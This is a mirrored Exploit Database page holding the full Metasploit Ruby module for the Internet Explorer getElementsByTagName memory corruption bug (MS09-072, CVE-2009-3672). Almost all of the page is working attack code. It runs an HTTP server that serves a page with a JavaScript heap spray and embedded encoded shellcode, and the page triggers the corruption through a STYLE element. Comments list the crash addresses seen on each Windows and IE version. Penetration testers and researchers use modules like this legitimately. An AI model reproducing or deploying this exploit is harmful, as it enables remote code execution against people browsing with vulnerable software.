Microsoft Internet Explorer – Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)

• Exploit Database
• 120 阅读

• 作者： Metasploit
  日期： 2010-07-12
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16547/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  ## # $Id: ms09_072_style_object.rb 9787 2010-07-12 02:51:50Z egypt $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML # # Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn # #include Msf::Exploit::Remote::BrowserAutopwn #autopwn_info({ # :ua_name=> HttpClients::IE, # :ua_minver=> "6.0", # :ua_maxver=> "7.0", # :javascript => true, # :os_name=> OperatingSystems::WINDOWS, # :vuln_test=> nil, # no way to test without just trying it # :rank => LowRanking# exploitable on ie7/vista #})   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Internet Explorer Style getElementsByTagName Memory Corruption&apos;, &apos;Description&apos;=> %q{ This module exploits a vulnerability in the getElementsByTagName function as implemented within Internet Explorer. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;securitylab.ir <K4mr4n_st[at]yahoo.com>&apos;, &apos;jduck&apos; ], &apos;Version&apos;=> &apos;$Revision: 9787 $&apos;, &apos;References&apos; => [ [&apos;MSB&apos;, &apos;MS09-072&apos;], [&apos;CVE&apos;, &apos;2009-3672&apos;], [&apos;OSVDB&apos;, &apos;50622&apos;], [&apos;BID&apos;, &apos;37085&apos;], [&apos;URL&apos;, &apos;http://www.microsoft.com/technet/security/advisory/977981.mspx&apos;], [&apos;URL&apos;, &apos;http://taossa.com/archive/bh08sotirovdowd.pdf&apos;], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos;=> &apos;process&apos;, &apos;HTTP::compression&apos; => &apos;gzip&apos;, &apos;HTTP::chunked&apos; => true }, &apos;Payload&apos;=> { &apos;Space&apos;=> 1000, &apos;BadChars&apos; => "\x00", &apos;Compat&apos; => { &apos;ConnectionType&apos; => &apos;-find&apos;, }, &apos;StackAdjustment&apos; => -3500 }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Automatic&apos;, { }], ], &apos;DisclosureDate&apos; => &apos;Nov 20 2009&apos;, &apos;DefaultTarget&apos;=> 0)) end   def on_request_uri(cli, request)   # resulting eips: # 0x501d6bd8 # windows vista ie7 (mshtml.dll 7.0.6001.18203) # 0xc5fe7dc9 # windows xp sp3 ie6 (mshtml.dll 6.0.2900.5848) # nul deref! # windows xp sp3 ie7 (mshtml.dll 7.0.5730.13) # 0x6e767fae # windows 2k3 sp2 ie6 (mshtml.dll 6.0.3790.4470) # 0x6cf941a7 # windows 2k3 sp2 ie7 (mshtml.dll 7.0.6000.16825)   print_status("Entering heap spray mode for #{cli.peerhost}:#{cli.peerport}")   var_memory= rand_text_alpha(rand(100) + 1) var_boom= rand_text_alpha(rand(100) + 1) var_body= rand_text_alpha(rand(100) + 1) var_unescape= rand_text_alpha(rand(100) + 1) var_shellcode = rand_text_alpha(rand(100) + 1) var_spray = rand_text_alpha(rand(100) + 1) var_start = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(100) + 1) var_ss= rand_text_alpha(rand(100) + 1) var_fb= rand_text_alpha(rand(100) + 1) var_bk= rand_text_alpha(rand(100) + 1)   html = %Q|<!DOCTYPE> <head> <script language=javascript> function #{var_boom}(){ document.getElementsByTagName(&apos;STYLE&apos;)[0].outerHTML++; } function #{var_body}(){ var #{var_unescape} = unescape; var #{var_shellcode} = #{var_unescape}( &apos;#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}&apos;); var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); var #{var_ss} = 20 + #{var_shellcode}.length; while (#{var_spray}.length < #{var_ss}) #{var_spray}+=#{var_spray}; #{var_fb} = #{var_spray}.substring(0,#{var_ss}); #{var_bk} = #{var_spray}.substring(0,#{var_spray}.length-#{var_ss}); while(#{var_bk}.length+#{var_ss} < 0x100000) #{var_bk} = #{var_bk}+#{var_bk}+#{var_fb}; var #{var_memory} = new Array(); for (#{var_i}=0;#{var_i}<1285;#{var_i}++) #{var_memory}[#{var_i}]=#{var_bk}+#{var_shellcode}; #{var_boom}(); } </script> <STYLE>* { margin: 0; overflow: scroll }</STYLE> <BODY ONLOAD="#{var_body}()"> </body> </html> |   # Transmit the response to the client send_response(cli, html, { &apos;Content-Type&apos; => &apos;text/html&apos;, &apos;Pragma&apos; => &apos;no-cache&apos; })   # Handle the payload handler(cli) end end